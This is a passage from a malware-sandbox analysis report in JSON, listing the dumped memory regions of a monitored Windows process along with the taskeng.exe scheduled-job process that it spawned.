"info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_386", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1272", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.356", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001275-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_389", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1275", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.359", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001277-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_391", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1277", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.360", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001278-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_392", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1278", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.361", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001280-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_394", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1280", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.362", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001281-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_395", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1281", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.364", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001284-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_398", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1284", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.366", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001286-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_400", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1286", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.368", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001287-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_401", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1287", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.369", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001290-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_404", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1290", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.371", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001292-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_406", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1292", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.372", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001293-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_407", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1293", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.373", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001296-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_410", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1296", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.375", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001299-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_413", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1299", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.377", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001301-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_415", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1301", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.379", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001302-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_416", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1302", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.380", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791759257600, "type": "region", "version": 1 }, "end_va": 8791760154623, "entry_point": 8791759390560, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1305", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791759257600, "timestamp": "00:01:39.382", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001306-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_419", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1306", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.385", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001308-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_421", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1308", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.386", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001309-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_422", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1309", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.387", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001311-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_424", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1311", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.388", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791779049472, "type": "region", "version": 1 }, "end_va": 8791781158911, "entry_point": 8791779193648, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1312", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791779049472, "timestamp": "00:01:39.389", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791761747968, "type": "region", "version": 1 }, "end_va": 8791762169855, "entry_point": 8791761793084, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1313", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791761747968, "timestamp": "00:01:39.390", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2000945152, "type": "region", "version": 1 }, "end_va": 2001969151, "entry_point": 2001052360, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1314", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2000945152, "timestamp": "00:01:39.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791784620032, "type": "region", "version": 1 }, "end_va": 8791784677375, "entry_point": 8791784624256, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1315", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791784620032, "timestamp": "00:01:39.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791763320832, "type": "region", "version": 1 }, "end_va": 8791764144127, "entry_point": 8791763822708, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1316", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791763320832, "timestamp": "00:01:39.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 167936, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 692223, "entry_point": 528400, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1317", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 524288, "timestamp": "00:01:39.395", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 5373952, "type": "region", "version": 1 }, "end_va": 6979583, "entry_point": 0, "filename": null, "id": "region_1318", "name": "pagefile_0x0000000000520000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5373952, "timestamp": "00:01:39.396", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791758405632, "type": "region", "version": 1 }, "end_va": 8791758594047, "entry_point": 8791758409744, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1320", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791758405632, "timestamp": "00:01:39.397", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791762206720, "type": "region", "version": 1 }, "end_va": 8791763292159, "entry_point": 8791762210916, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1321", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791762206720, "timestamp": "00:01:39.399", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 7012352, "type": "region", "version": 1 }, "end_va": 8589311, "entry_point": 0, "filename": null, "id": "region_1322", "name": "pagefile_0x00000000006b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7012352, "timestamp": "00:01:39.401", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 8650752, "type": "region", "version": 1 }, "end_va": 29622271, "entry_point": 0, "filename": null, "id": "region_1323", "name": "pagefile_0x0000000000840000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8650752, "timestamp": "00:01:39.402", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 552959, "entry_point": 0, "filename": null, "id": "region_1324", "name": "pagefile_0x0000000000080000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 524288, "timestamp": "00:01:39.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 598015, "entry_point": 0, "filename": null, "id": "region_1325", "name": "pagefile_0x0000000000090000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 589824, "timestamp": "00:01:39.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_1326", "name": "private_0x00000000000a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 655360, "timestamp": "00:01:39.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 724991, "entry_point": 0, "filename": null, "id": "region_1327", "name": "private_0x00000000000b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 720896, "timestamp": "00:01:39.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 29622272, "type": "region", "version": 1 }, "end_va": 33763327, "entry_point": 0, "filename": null, "id": "region_1328", "name": "pagefile_0x0000000001c40000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29622272, "timestamp": "00:01:39.406", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001329-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_425", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1329", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.407", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001331-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_427", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1331", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.408", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001332-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_428", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1332", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.410", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001334-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_430", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1334", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.411", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001335-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_431", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1335", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.412", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791787372544, "type": "region", "version": 1 }, "end_va": 8791788253183, "entry_point": 8791787385460, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_1338", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791787372544, "timestamp": "00:01:39.413", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001339-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_434", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1339", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.417", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001341-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_436", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1341", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.418", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001342-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_437", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1342", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.420", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001344-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_439", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1344", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.421", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001345-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_440", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1345", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.422", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1347", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.422", "type": "region", "version": 1 } ], "terminate_reason": "timeout", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "taskeng.exe {CFDCF914-63AE-4446-B16F-E0A62E2EE661} S-1-5-21-1836691140-625943148-109919340-1000:AUFDDCNTXWT\\aDU0VK IWA5kLS:Interactive:LUA[1]", "filename": "c:\\windows\\system32\\taskeng.exe", "id": "proc_9", "image_name": "taskeng.exe", "monitor_reason": "created_scheduled_job", "monitored_id": 9, "origin_monitor_id": 8, "ref_parent_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1637", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:02:07.870", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 159743, "entry_point": 0, "filename": null, "id": "region_1638", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:02:07.870", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 720895, "entry_point": 0, "filename": null, "id": "region_1639", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:02:07.870", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 737279, "entry_point": 0, "filename": null, "id": "region_1640", "name": "pagefile_0x00000000000b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 720896, "timestamp": "00:02:07.870", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 790527, "entry_point": 0, "filename": null, "id": "region_1641", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:02:07.870", "type": "region", 